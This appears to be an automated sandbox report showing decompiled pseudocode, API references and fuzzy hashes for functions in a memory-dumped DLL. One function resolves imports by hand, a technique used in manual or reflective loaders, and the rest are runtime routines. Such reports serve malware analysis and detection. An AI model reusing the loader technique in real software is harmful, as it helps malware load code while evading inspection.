libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E6EDCDA40(intOrPtr __ecx, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int* _v24;
				signed int* _v28;
				intOrPtr _v32;
				intOrPtr* _v36;
				signed int _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				long _v60;
				void* _v64;
				CHAR* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				long _v80;
				intOrPtr _v84;
				signed int _v88;
				char _v112;
				char _v136;
				intOrPtr _t115;
				signed int* _t120;
				intOrPtr _t123;
				signed int _t183;
				signed int _t189;
				intOrPtr _t199;

				_push(0xffffffff);
				_push(0x6ee56258);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t199;
				_v76 = __ecx;
				E6EDB18A0( &_v136, __eflags, 0x6ee5730c);
				_v8 = 0;
				E6EDB12B0(__eflags,  &_v112,  &_v136, 0x6ee57310);
				_v8 = 1;
				E6EDB30F0( &_v112);
				_push(E6EDB2660( &_v112));
				E6EDB1340(_t109);
				_v20 = _a4;
				_v32 = _a4 +  *((intOrPtr*)(_v20 + 0x3c));
				if( *((intOrPtr*)(_v32 + 0xbadc25)) != 0) {
					_v24 =  *((intOrPtr*)(_v32 + 0xbadc25)) + _v20;
					_t115 = _v32;
					__eflags =  *(_t115 + 0xd8);
					if( *(_t115 + 0xd8) == 0) {
						_v40 = 1;
					} else {
						_v40 = 0xc;
					}
					_v44 = _v40;
					_v56 =  *((intOrPtr*)(_v32 + 0x78 + _v44 * 8));
					_v60 =  *((intOrPtr*)(_v32 + 0x7c + _v44 * 8));
					_t183 = _v56 + _v20;
					__eflags = _t183;
					_v64 = _t183;
					VirtualProtect(_v64, _v60, 4,  &_v80);
					while(1) {
						_t120 = _v24;
						__eflags =  *(_t120 + 0xc);
						if( *(_t120 + 0xc) == 0) {
							break;
						}
						_t57 =  &(_v24[3]); // 0xcccccccc
						_v84 =  *_t57 + _v20;
						_t61 =  &(_v24[3]); // 0xcccccccc
						_v48 = LoadLibraryA( *_t61 + _v20);
						_t65 =  &(_v24[4]); // 0xcccccccc
						_v36 =  *_t65 + _v20;
						__eflags =  *_v24;
						if( *_v24 == 0) {
							_t73 =  &(_v24[4]); // 0xcccccccc
							_t189 =  *_t73 + _v20;
							__eflags = _t189;
							_v28 = _t189;
						} else {
							_v28 =  *_v24 + _v20;
						}
						while(1) {
							__eflags =  *_v28;
							if( *_v28 == 0) {
								break;
							}
							__eflags =  *_v28 & 0x80000000;
							if(( *_v28 & 0x80000000) == 0) {
								_t86 = _v20 + 2; // 0x2
								_v68 =  *_v28 + _t86;
								 *_v36 = GetProcAddress(_v48, _v68);
							} else {
								_v88 =  *_v28 & 0x0000ffff;
								 *_v36 = GetProcAddress(_v48,  *_v28 & 0x0000ffff);
							}
							_v36 = _v36 + 4;
							_v28 =  &(_v28[1]);
						}
						_v24 =  &(_v24[5]);
					}
					_v72 = 1;
					_v8 = 0;
					E6EDB1D80( &_v112);
					_v8 = 0xffffffff;
					E6EDB1D80( &_v136);
					_t123 = _v72;
					L17:
					 *[fs:0x0] = _v16;
					return _t123;
				}
				_v52 = 1;
				_v8 = 0;
				E6EDB1D80( &_v112);
				_v8 = 0xffffffff;
				E6EDB1D80( &_v136);
				_t123 = _v52;
				goto L17;
			}

APIs

task.LIBCPMTD ref: 6EDCDADC
task.LIBCPMTD ref: 6EDCDAEE
VirtualProtect.KERNEL32(?,?,00000004,?,?,?,?,6EE5730C), ref: 6EDCDB69
LoadLibraryA.KERNEL32(000000FF,?,?,?,6EE5730C), ref: 6EDCDB92
GetProcAddress.KERNEL32(?,00000000), ref: 6EDCDBFA
GetProcAddress.KERNEL32(?,?), ref: 6EDCDC1E

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProctask$LibraryLoadProtectVirtual
String ID:
API String ID: 1190531450-0
Opcode ID: 72da010b6a79eed03593712e2835a57b32f81fbad7a5353952ef8e50b357f787
Instruction ID: 3c736ea426c22d686270cf3495b7f5f8c121e6242791f9c93000b9eae0a6d5c1
Opcode Fuzzy Hash: 72da010b6a79eed03593712e2835a57b32f81fbad7a5353952ef8e50b357f787
Instruction Fuzzy Hash: DF81CFB4D0020ADFCB08CF98C990BEEB7B6BF48314F208568E515AB390D735A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 6EDB2C50, Relevance: 12.1, APIs: 8, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E6EDB2C50(intOrPtr* __ecx, void* __eflags, signed short* _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr* _v20;
				signed short* _v24;
				intOrPtr* _v28;
				char _v52;
				char _v76;
				intOrPtr _t86;
				intOrPtr _t88;

				_push(0xffffffff);
				_push(E6EE560D5);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t88;
				_v20 = __ecx;
				 *_v20 = _a4;
				 *((intOrPtr*)(_v20 + 4)) = 0;
				E6EDB18A0( &_v76, __eflags, 0x6ee57298);
				_v8 = 0;
				E6EDB12B0(__eflags,  &_v52,  &_v76, 0x6ee5729c);
				_v8 = 1;
				_v24 = _a4;
				if(( *_v24 & 0x0000ffff) == 0x5a4d) {
					_t20 =  &(_v24[0x1e]); // 0x7f90b890
					_v28 = _v24 +  *_t20;
					__eflags =  *_v28 - 0x4550;
					if( *_v28 == 0x4550) {
						_t86 = _v28;
						__eflags = ( *(_t86 + 0x18) & 0x0000ffff) - 0x10b;
						if(( *(_t86 + 0x18) & 0x0000ffff) == 0x10b) {
							E6EDB30F0( &_v52);
							_push(E6EDB2660( &_v52));
							E6EDB1340(_t54);
							 *((intOrPtr*)(_v20 + 4)) = _v28;
							_v8 = 0;
							E6EDB1D80( &_v52);
							_v8 = 0xffffffff;
							E6EDB1D80( &_v76);
						} else {
							_v8 = 0;
							E6EDB1D80( &_v52);
							_v8 = 0xffffffff;
							E6EDB1D80( &_v76);
						}
					} else {
						_v8 = 0;
						E6EDB1D80( &_v52);
						_v8 = 0xffffffff;
						E6EDB1D80( &_v76);
					}
				} else {
					_v8 = 0;
					E6EDB1D80( &_v52);
					_v8 = 0xffffffff;
					E6EDB1D80( &_v76);
				}
				 *[fs:0x0] = _v16;
				return _v20;
			}

APIs

task.LIBCPMTD ref: 6EDB2CC8
task.LIBCPMTD ref: 6EDB2CD7
task.LIBCPMTD ref: 6EDB2CFF
task.LIBCPMTD ref: 6EDB2D0E

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: task
String ID:
API String ID: 1384045349-0
Opcode ID: d962a00d71072de579484de36d5f6dbd97910bbdbcab3c965cc41ca33b63a682
Instruction ID: 9fa7db0603c09f4350f159c8b644cba06b87ff01c2bdde0f440c199bf15be645
Opcode Fuzzy Hash: d962a00d71072de579484de36d5f6dbd97910bbdbcab3c965cc41ca33b63a682
Instruction Fuzzy Hash: 194128B4C21209DBCB04DFD4C990BEEBBB4BF14314F244A58E452673D0EB346A4ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6EE44A0B, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EE44A0B(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0x6ee79288 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0x6ee5f070 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L12:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L14:
							if(_t32 != 0) {
								_t16 = _t32;
								L18:
								return _t16;
							}
							L15:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L9:
							_t32 = 0;
							L10:
							if(_t32 != 0) {
								goto L12;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L15;
						}
						_t18 = E6EE44055(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = E6EE44055(_t23, L"ext-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L9;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L10;
					}
					if(_t32 == 0xffffffff) {
						goto L15;
					}
					goto L14;
				}
				_t16 = 0;
				goto L18;
			}

Strings

ext-ms-, xrefs: 6EE44A76
api-ms-, xrefs: 6EE44A62

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 0f13035cd3e0ca15026d629a99544f7094ad12bbef3cd6d5097574b2192e6f37
Instruction ID: 70bf71916605d21761c13a220688812e19d3c527a5d6606c079b934c21247754
Opcode Fuzzy Hash: 0f13035cd3e0ca15026d629a99544f7094ad12bbef3cd6d5097574b2192e6f37
Instruction Fuzzy Hash: 4C210532B11632EBDB518EE9AC40A0A37E89F027A4F350512ED15AB3C4F730ED02D5E4

Uniqueness

Uniqueness Score: -1.00%

Function 6EDEEFC0, Relevance: 10.6, APIs: 7, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc1f836cfc962e0e53fb91029044a71e22e42f0a31aae05012046ff067863bd4
Instruction ID: 3b0a33d1668d2f52997f2f4b2d81dee3134ec2d78f2ab68dcb6a5ec78b9c9ae1
Opcode Fuzzy Hash: bc1f836cfc962e0e53fb91029044a71e22e42f0a31aae05012046ff067863bd4
Instruction Fuzzy Hash: 532116B6910608FFCB54DFE4D84CFAEBB78AB49305F208999FA0197244DB359A44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6EE514D5, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EE514D5(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E6EE51221(_t45, 7);
					E6EE51221(_t45 + 0x1c, 7);
					E6EE51221(_t45 + 0x38, 0xc);
					E6EE51221(_t45 + 0x68, 0xc);
					E6EE51221(_t45 + 0x98, 2);
					E6EE4471C( *((intOrPtr*)(_t45 + 0xa0)));
					E6EE4471C( *((intOrPtr*)(_t45 + 0xa4)));
					E6EE4471C( *((intOrPtr*)(_t45 + 0xa8)));
					E6EE51221(_t45 + 0xb4, 7);
					E6EE51221(_t45 + 0xd0, 7);
					E6EE51221(_t45 + 0xec, 0xc);
					E6EE51221(_t45 + 0x11c, 0xc);
					E6EE51221(_t45 + 0x14c, 2);
					E6EE4471C( *((intOrPtr*)(_t45 + 0x154)));
					E6EE4471C( *((intOrPtr*)(_t45 + 0x158)));
					E6EE4471C( *((intOrPtr*)(_t45 + 0x15c)));
					return E6EE4471C( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

APIs

Part of subcall function 6EE51221: _free.LIBCMT ref: 6EE51246

_free.LIBCMT ref: 6EE51523

Part of subcall function 6EE4471C: RtlFreeHeap.NTDLL(00000000,00000000,?,6EE5124B,?,00000000,?,?,?,6EE514EE,?,00000007,?,?,6EE4EB20,?), ref: 6EE44732
Part of subcall function 6EE4471C: GetLastError.KERNEL32(?,?,6EE5124B,?,00000000,?,?,?,6EE514EE,?,00000007,?,?,6EE4EB20,?,?), ref: 6EE44744

_free.LIBCMT ref: 6EE5152E
_free.LIBCMT ref: 6EE51539
_free.LIBCMT ref: 6EE5158D
_free.LIBCMT ref: 6EE51598
_free.LIBCMT ref: 6EE515A3
_free.LIBCMT ref: 6EE515AE

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 851172afdbfda7c5b33af3e26ae0dd2e6a5cf916cb08f35f6880e5c7f6930ac4
Instruction ID: 6a370a91683d7c1870bc5ccd28b1c82909fcca8df08dbcfb3ba1eb43d0e1ad15
Opcode Fuzzy Hash: 851172afdbfda7c5b33af3e26ae0dd2e6a5cf916cb08f35f6880e5c7f6930ac4
Instruction Fuzzy Hash: 24119D71600F04EED620AFF1EC49FCF7B9C9F01304F500C2DA2A9A6351DB26B6299642

Uniqueness

Uniqueness Score: -1.00%

Function 6EE4A208, Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E6EE4A208(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0, void* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				long _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				long _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				struct _OVERLAPPED* _t242;
				signed int _t245;
				intOrPtr _t248;
				signed int _t251;
				signed int _t252;
				signed int _t254;
				intOrPtr _t256;
				void* _t262;
				intOrPtr _t263;
				signed int _t264;
				signed int _t267;
				signed char _t268;
				intOrPtr _t271;
				signed int _t273;
				long _t274;
				signed int _t275;
				signed char* _t278;
				signed int _t282;
				signed int _t284;
				signed int _t289;
				signed int _t290;
				intOrPtr _t291;
				signed int _t292;
				struct _OVERLAPPED* _t294;
				struct _OVERLAPPED* _t296;
				signed int _t298;
				signed int _t300;
				void* _t301;
				void* _t303;

				_t326 = __fp0;
				_t298 = _t300;
				_t301 = _t300 - 0x8c;
				_t170 =  *0x6ee77a68; // 0xa89efc87
				_v8 = _t170 ^ _t298;
				_t172 = _a8;
				_t267 = _t172 >> 6;
				_t245 = (_t172 & 0x0000003f) * 0x38;
				_t278 = _a12;
				_v108 = _t278;
				_v80 = _t267;
				_v112 =  *((intOrPtr*)(_t245 +  *((intOrPtr*)(0x6ee79368 + _t267 * 4)) + 0x18));
				_v44 = _t245;
				_v96 = _a16 + _t278;
				_t178 = GetConsoleOutputCP();
				_t242 = 0;
				_v124 = _t178;
				E6EE3B82D( &_v72, _t267, __fp0, 0);
				_t284 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t248 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t248;
				_v104 = _t278;
				if(_t278 >= _v96) {
					L49:
					__eflags = _v60 - _t242;
				} else {
					while(1) {
						_t251 = _v44;
						_v51 =  *_t278;
						_v76 = _t242;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x6ee79368 + _v80 * 4));
						_v48 = _t186;
						if(_t248 != 0xfde9) {
							goto L20;
						}
						_t211 = _t242;
						_t271 = _v48 + 0x2e + _t251;
						_v116 = _t271;
						while( *((intOrPtr*)(_t271 + _t211)) != _t242) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t273 = _v96 - _t278;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t278 & 0x000000ff) + 0x6ee77cf0; // 0x0
							_t256 =  *_t72 + 1;
							_v48 = _t256;
							__eflags = _t256 - _t273;
							if(_t256 > _t273) {
								__eflags = _t273;
								if(_t273 <= 0) {
									goto L41;
								} else {
									_t290 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x6ee79368 + _v80 * 4)) + _t290 + _t242 + 0x2e)) =  *((intOrPtr*)(_t242 + _t278));
										_t242 =  &(_t242->Internal);
										__eflags = _t242 - _t273;
									} while (_t242 < _t273);
									goto L40;
								}
							} else {
								_v144 = _t242;
								__eflags = _t256 - 4;
								_v140 = _t242;
								_v56 = _t278;
								_v40 = (_t256 == 4) + 1;
								_t220 = E6EE4F273( &_v144,  &_v76,  &_v56, (_t256 == 4) + 1,  &_v144);
								_t303 = _t301 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L49;
								} else {
									_t291 = _v48;
									goto L19;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t251 + _v48 + 0x2e) & 0x000000ff) + 0x6ee77cf0)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t273) {
								__eflags = _t273;
								if(_t273 > 0) {
									_t292 = _t251;
									do {
										_t227 =  *((intOrPtr*)(_t242 + _t278));
										_t262 =  *((intOrPtr*)(0x6ee79368 + _v80 * 4)) + _t292 + _t242;
										_t242 =  &(_t242->Internal);
										 *((char*)(_t262 + _v40 + 0x2e)) = _t227;
										_t292 = _v44;
										__eflags = _t242 - _t273;
									} while (_t242 < _t273);
									L40:
									_t284 = _v88;
								}
								L41:
								_t289 = _t284 + _t273;
								__eflags = _t289;
								L42:
								__eflags = _v60;
								_v88 = _t289;
							} else {
								_t274 = _v40;
								_t294 = _t242;
								_t263 = _v116;
								do {
									 *((char*)(_t298 + _t294 - 0xc)) =  *((intOrPtr*)(_t263 + _t294));
									_t294 =  &(_t294->Internal);
								} while (_t294 < _t274);
								_t295 = _v48;
								_t264 = _v44;
								if(_v48 > 0) {
									E6EE37600( &_v16 + _t274, _t278, _t295);
									_t264 = _v44;
									_t301 = _t301 + 0xc;
									_t274 = _v40;
								}
								_t282 = _v80;
								_t296 = _t242;
								do {
									 *( *((intOrPtr*)(0x6ee79368 + _t282 * 4)) + _t264 + _t296 + 0x2e) = _t242;
									_t296 =  &(_t296->Internal);
								} while (_t296 < _t274);
								_t278 = _v104;
								_t291 = _v48;
								_v120 =  &_v16;
								_v136 = _t242;
								_v132 = _t242;
								_v40 = (_v56 == 4) + 1;
								_t237 = E6EE4F273( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t303 = _t301 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L49;
								} else {
									L19:
									_t278 = _t278 - 1 + _t291;
									L28:
									_t278 =  &(_t278[1]);
									_v104 = _t278;
									_t193 = E6EE4D232(_v124, _t242,  &_v76, _v40,  &_v32, 5, _t242, _t242);
									_t301 = _t303 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L49;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t242) == 0) {
											L48:
											_v92 = GetLastError();
											goto L49;
										} else {
											_t284 = _v84 - _v108 + _t278;
											_v88 = _t284;
											if(_v100 < _v56) {
												goto L49;
											} else {
												if(_v51 != 0xa) {
													L35:
													if(_t278 >= _v96) {
														goto L49;
													} else {
														_t248 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t242) == 0) {
														goto L48;
													} else {
														if(_v100 < 1) {
															goto L49;
														} else {
															_v84 = _v84 + 1;
															_t284 = _t284 + 1;
															_v88 = _t284;
															goto L35;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L50;
						L20:
						_t268 =  *((intOrPtr*)(_t251 + _t186 + 0x2d));
						__eflags = _t268 & 0x00000004;
						if((_t268 & 0x00000004) == 0) {
							_v33 =  *_t278;
							_t188 = E6EE41111(_t268, _t326);
							_t252 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t252 * 2)) - _t242;
							if( *((intOrPtr*)(_t188 + _t252 * 2)) >= _t242) {
								_push(1);
								_push(_t278);
								goto L27;
							} else {
								_t100 =  &(_t278[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t275 = _v80;
									_t254 = _v44;
									 *((char*)(_t254 +  *((intOrPtr*)(0x6ee79368 + _t275 * 4)) + 0x2e)) = _v33;
									 *(_t254 +  *((intOrPtr*)(0x6ee79368 + _t275 * 4)) + 0x2d) =  *(_t254 +  *((intOrPtr*)(0x6ee79368 + _t275 * 4)) + 0x2d) | 0x00000004;
									_t289 = _t284 + 1;
									goto L42;
								} else {
									_t206 = E6EE45629( &_v76, _t278, 2);
									_t303 = _t301 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L49;
									} else {
										_t278 = _v56;
										goto L28;
									}
								}
							}
						} else {
							_v24 =  *((intOrPtr*)(_t251 + _t186 + 0x2e));
							_v23 =  *_t278;
							_push(2);
							 *(_t251 + _v48 + 0x2d) = _t268 & 0x000000fb;
							_push( &_v24);
							L27:
							_push( &_v76);
							_t190 = E6EE45629();
							_t303 = _t301 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L49;
							} else {
								goto L28;
							}
						}
						goto L50;
					}
				}
				L50:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t298;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E6EE361A7(_v8 ^ _t298);
			}

APIs

GetConsoleOutputCP.KERNEL32(?,00000000,?), ref: 6EE4A250
__fassign.LIBCMT ref: 6EE4A435
__fassign.LIBCMT ref: 6EE4A452
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6EE4A49A
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6EE4A4DA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6EE4A582

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 8ad58b60bb5d905c5e31d2aaebd7caab8f16809de8ffbf87571c5f14720bd30c
Instruction ID: f44758757f769ecd7b6ae00f9772529dc89c1d56811ddad7c5199533d5ccda50
Opcode Fuzzy Hash: 8ad58b60bb5d905c5e31d2aaebd7caab8f16809de8ffbf87571c5f14720bd30c
Instruction Fuzzy Hash: 03C19F71D00259DFDF00CFE8D9809DDBBB9AF49314F28416AE859B7341E7359A02CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6EE35DE9, Relevance: 9.2, APIs: 6, Instructions: 175COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 6EE35E32
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 6EE35E9D
LCMapStringEx.KERNEL32 ref: 6EE35EBA
LCMapStringEx.KERNEL32 ref: 6EE35EF9
LCMapStringEx.KERNEL32 ref: 6EE35F58
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6EE35F7B

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: c0e091f60ae45a3f66355448d6f219282aaad7b6cb5c7e224f88d1680239359c
Instruction ID: 5763b2aa7e298a8a5678e45c5b9d869b5c22eb32ce619791d8cc7f23c31b19e7
Opcode Fuzzy Hash: c0e091f60ae45a3f66355448d6f219282aaad7b6cb5c7e224f88d1680239359c
Instruction Fuzzy Hash: 85518D7652062AAFEF108FE5CC44FAB3BB9EB41748F314429F91496390D735C919CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6EDCBCF0, Relevance: 9.1, APIs: 6, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6EDCBCF0(intOrPtr __ecx, void* __eflags, char _a4, char _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v40;
				intOrPtr* _t36;
				intOrPtr* _t38;
				signed char _t47;
				intOrPtr* _t48;
				signed char _t56;

				_v8 = __ecx;
				E6EDCCF30(_v8);
				_push( &_a12);
				_push( &_a4);
				E6EDB1340( &_a12);
				_t36 = E6EDB1440( &_a4);
				_v16 =  *_t36;
				_v12 =  *((intOrPtr*)(_t36 + 4));
				_t38 = E6EDB1440( &_a12);
				_v32 =  *_t38;
				_v28 =  *((intOrPtr*)(_t38 + 4));
				E6EDCD230(_v8, __eflags,  &_v24);
				E6EDCD2D0(_v8, __eflags,  &_v40);
				while((E6EDCC590( &_v16,  &_v32) & 0x000000ff) != 0) {
					_t47 = E6EDCC560( &_v24,  &_v40);
					_t92 = _t47 & 0x000000ff;
					if((_t47 & 0x000000ff) == 0) {
						_t48 = E6EDCC600( &_v16, __eflags);
						 *((char*)(E6EDCC650( &_v24))) =  *_t48;
						E6EDCC690( &_v24);
						E6EDCC670( &_v16);
						continue;
					} else {
						goto L4;
					}
					do {
						L4:
						E6EDCBEB0(_v8, _t92, E6EDCC600( &_v16, _t92));
						E6EDCC670( &_v16);
						_t56 = E6EDCC590( &_v16,  &_v32);
					} while ((_t56 & 0x000000ff) != 0);
					return _t56;
				}
				return E6EDCC8E0(_v8, E6EDCC6D0( &_v40,  &_v24));
			}

APIs

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6EDCBCFD
__FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 6EDCBD5D
Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 6EDCBD69

Part of subcall function 6EDCC590: std::error_category::operator==.LIBCPMTD ref: 6EDCC5A0

